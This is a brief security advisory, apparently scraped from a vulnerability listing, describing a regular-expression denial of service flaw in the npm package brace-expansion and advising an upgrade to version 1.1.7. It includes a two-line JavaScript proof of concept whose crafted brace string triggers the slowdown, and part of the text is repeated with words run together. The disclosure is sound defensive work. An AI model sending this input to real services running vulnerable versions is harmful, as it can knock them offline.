Affected versions of brace-expansion are vulnerable to a regular expression denial of service condition.
Proof of Concept
var expand = require('brace-expansion');
expand('{,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\n}');
Affected versions of
brace-expansionare vulnerable to a regular expression denial of service condition.Proof of Concept
Recommendation
Update to version 1.1.7 or later.
References